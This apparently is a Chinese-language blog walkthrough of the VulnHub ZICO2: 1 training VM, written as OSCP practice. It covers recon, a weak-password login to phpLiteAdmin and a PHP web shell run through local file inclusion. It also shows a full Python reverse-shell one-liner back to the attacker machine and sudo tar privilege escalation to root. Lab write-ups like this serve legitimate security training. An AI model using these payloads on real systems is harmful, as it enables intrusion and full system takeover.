---------------------------------------------------------------
本文题干阅读时间推荐20min,靶场练习推荐3h
----------------------------------------------------------------
如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:
-
OSCP相关技术(备考中)
-
CISSP备考经验(已通过认证)
-
CCSK(云安全)(已通过认证)
-
ISO/IEC 27001 Foundation(已通过认证)
----------------------------------------------------------------
一、前言
主要利用方式:弱口令进入系统,通过数据库注入写入shell,文件包含漏洞(LFI)+命令执行漏洞=反弹shell数据库配置信息获取密码,切换SSH用户登录sudo查看权限,通过tar命令提权到root权限
二、靶机信息
靶场: vulnhub.com靶机名称: ZICO2: 1难度: 中等发布时间: 19 Jun 2017下载地址:https://www.vulnhub.com/entry/zico2-1,210/备注:利用方式还是很多的,细节也很多
三、虚拟机配置
VirtualBox、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配攻击IP:10.0.2.31靶机IP:10.0.2.32
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.2.32
└─$ sudo nmap -p22,80 -sV -A 10.0.2.10
靶机开放了22/ssh、80/http、111/rpcbind、58853/status等端口服务
3、80端口web访问,以及路径扫描
http://10.0.2.32/
└─$ dirsearch -u http://10.0.2.32/
4、访问dbadmin页面,存在一个test_db.php页面
http://10.0.2.32/dbadmin/
4、继续点击页面,为phpLiteAdmin页面
http://10.0.2.32/dbadmin/test_db.php
尝试baidu一下,尝试弱口令,以admin进入。
5、信息收集,发现root和zico的md5加密值
653F4B285089453FE00E2AAFAC573414==》34kroot3496781A607F4E9F5F423AC01F0DAB0EBD==》zico2215@
6、在view页面,发现可以有一个本地文件包含(LFI)漏洞,能查看本地的etc/passed文件。
http://10.0.2.32/view.php?page=../../../../../etc/passwd
五、漏洞利用(突破边界)
7、22端口SSH登录尝试(root/34kroot34、zico/zico2215@)皆未成功
8、查找phpliteadmin是否有漏洞
└─$ searchsploit phpliteadmin
复制下来,查看使用方式
└─$ searchsploit -m php/webapps/24044.txt
└─$ cat 24044.txt
poc提示:攻击者可以创建一个具有php扩展名的sqlite数据库,并将php代码作为文本字段插入。完成后,攻击者可以通过Webbrowser访问数据库文件来执行它。
9、按照POC执行一句话木马
创建数据库hack.php
创建新表
Name: 1 Number of Fields: 1 ---点击Go
创建列,填入phpinfo的poc
访问hack.php文件
路径为 /usr/databases/hack.php
http://10.0.2.32/view.php?page=../../../../../usr/databases/hack.php
将hack.php改成cmd命令执行文件
' echo system($_GET["cmd"]);'
Table '1' has been created.
CREATE TABLE '1' ('cmd' INTEGER default '''<?php echo system($_GET["cmd"]);?>''')
10、利用命令执行
http://10.0.2.32/view.php?page=../../../../../usr/databases/hack.php&cmd=id
探测是否存在python
10.0.2.32/view.php?page=../../../../../usr/databases/hack.php&cmd=whichpython
11、执行反弹shell
攻击机开启8888端口监听
靶机命令执行反弹shell
http://10.0.2.32/view.php?page=../../../../../usr/databases/hack.php&cmd=python-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.31",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功反弹获得普通用户的shell!
六、提权
12、升级交互式tty
$ python -c 'import pty;pty.spawn("/bin/bash")'
13、上传linpeas.sh
https://linpeas.sh/攻击机开启http服务
靶机cd到tmp文件夹,wget下载linpeas.sh文件,赋权执行
14、发现存在zico的数据库密码
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');define('DB_USER', 'zico');
15、ssh切换用户
└─$ ssh zico@10.0.2.32
16、查看sudo利用
17、利用poc,获取root权限,验证ID及IP,获得flag
https://gtfobins.github.io/gtfobins/tar/
zico@zico:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh# id# ip a# cd /root# cat flag.txt
-----------------------------------------------
本期靶场到此就结束啦,我们下期再见
--------------------------------------------------
走之前记得点个“在看”哟~
原文始发于微信公众号(从放弃到入门):【OSCP模拟-No.39】 zico2: 1靶机渗透测试练习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论